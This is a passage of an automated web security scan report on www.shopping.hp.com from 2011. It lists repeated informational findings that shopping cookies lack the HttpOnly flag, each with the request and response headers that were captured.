Path:	/can/computer/categories/digital_cameras/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkpj9iX0A54NSzsuFTXeQGc0ic%3D; expires=Friday, 28-Oct-2011 12:16:52 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/digital_cameras/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:52 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpj9iX0A54NSzsuFTXeQGc0ic%3D; expires=Friday, 28-Oct-2011 12:16:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.30. http://www.shopping.hp.com/can/computer/categories/docking_solutions/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/docking_solutions/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkriNCS2wh9MiDivFvddgWcl2vi; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/docking_solutions/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkriNCS2wh9MiDivFvddgWcl2vi; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.31. http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/docking_solutions/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktgt%2BR3glwMSvpulbbdwWW0ic%3D; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/docking_solutions/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:52 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktgt%2BR3glwMSvpulbbdwWW0ic%3D; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.32. http://www.shopping.hp.com/can/computer/categories/home_theater_audio/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/home_theater_audio/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkpit%2BT3gp7NivtvlPWcA2em2vi; expires=Friday, 28-Oct-2011 12:18:22 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/home_theater_audio/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:18:22 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpit%2BT3gp7NivtvlPWcA2em2vi; expires=Friday, 28-Oct-2011 12:18:22 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:22 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.33. http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/home_theater_audio/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkriNGW0QhxMCvsuVTbcQaZmWvi; expires=Friday, 28-Oct-2011 12:19:03 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:19:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/home_theater_audio/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:19:02 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkriNGW0QhxMCvsuVTbcQaZmWvi; expires=Friday, 28-Oct-2011 12:19:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:19:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.34. http://www.shopping.hp.com/can/computer/categories/memory/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/memory/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlksjNiS3QJ%2BNCjvuFrXcgeZ0ic%3D; expires=Friday, 28-Oct-2011 12:16:00 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/memory/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:00 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksjNiS3QJ%2BNCjvuFrXcgeZ0ic%3D; expires=Friday, 28-Oct-2011 12:16:00 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:00 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.35. http://www.shopping.hp.com/can/computer/categories/memory/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/memory/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkiiN6Q0Al8NijjslXdcgOe0ic%3D; expires=Friday, 28-Oct-2011 12:15:59 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/memory/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:58 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN6Q0Al8NijjslXdcgOe0ic%3D; expires=Friday, 28-Oct-2011 12:15:59 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:59 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.36. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkqjtCQ3Q57MizrvVvadgWemmvi; expires=Friday, 28-Oct-2011 12:16:01 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/mice_keyboards/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:01 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjtCQ3Q57MizrvVvadgWemmvi; expires=Friday, 28-Oct-2011 12:16:01 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:01 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.37. http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/mice_keyboards/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkviNiU3A9%2FMinvvFfXdQKa0ic%3D; expires=Friday, 28-Oct-2011 12:16:03 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/mice_keyboards/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkviNiU3A9%2FMinvvFfXdQKa0ic%3D; expires=Friday, 28-Oct-2011 12:16:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.38. http://www.shopping.hp.com/can/computer/categories/music_devices/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/music_devices/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvitme2Ax%2FOi7svFfWcgWd0ic%3D; expires=Friday, 28-Oct-2011 12:18:06 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/music_devices/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:18:06 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvitme2Ax%2FOi7svFfWcgWd0ic%3D; expires=Friday, 28-Oct-2011 12:18:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:06 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.39. http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/music_devices/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktidCV2Al7MyzuulfadgOX0ic%3D; expires=Friday, 28-Oct-2011 12:18:10 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/music_devices/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:18:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktidCV2Al7MyzuulfadgOX0ic%3D; expires=Friday, 28-Oct-2011 12:18:10 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:18:10 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.40. http://www.shopping.hp.com/can/computer/categories/networking/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/networking/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkii9mW2gx4Oinuv1PYeAWd0ic%3D; expires=Friday, 28-Oct-2011 12:15:56 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/networking/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:56 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkii9mW2gx4Oinuv1PYeAWd0ic%3D; expires=Friday, 28-Oct-2011 12:15:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.41. http://www.shopping.hp.com/can/computer/categories/networking/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/networking/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkuj9mR2wx%2FMSvivVTdeQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/networking/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkuj9mR2wx%2FMSvivVTdeQGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.42. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkqjtyR3wN%2BMi3julfZeAGYnWvi; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/notebook_batteries/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjtyR3wN%2BMi3julfZeAGYnWvi; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.43. http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/notebook_batteries/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkjjNuQ0Ap5MCzuvFLedwCc0ic%3D; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/notebook_batteries/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjjNuQ0Ap5MCzuvFLedwCc0ic%3D; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.44. http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/photo_frames/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkugt%2BQ3g17Oy7sslbadASb0ic%3D; expires=Friday, 28-Oct-2011 12:16:58 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/photo_frames/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:58 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkugt%2BQ3g17Oy7sslbadASb0ic%3D; expires=Friday, 28-Oct-2011 12:16:58 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:58 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.45. http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/photo_frames/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlksi9CW2wtwMCnpulPWcgea0ic%3D; expires=Friday, 28-Oct-2011 12:17:11 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/photo_frames/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:17:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksi9CW2wtwMCnpulPWcgea0ic%3D; expires=Friday, 28-Oct-2011 12:17:11 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:11 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.46. http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/projector_accessories/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkrjt2Q2wl4MSzqslXcdQKbn2vi; expires=Friday, 28-Oct-2011 12:17:38 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/projector_accessories/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrjt2Q2wl4MSzqslXcdQKbn2vi; expires=Friday, 28-Oct-2011 12:17:38 GMT; path=/
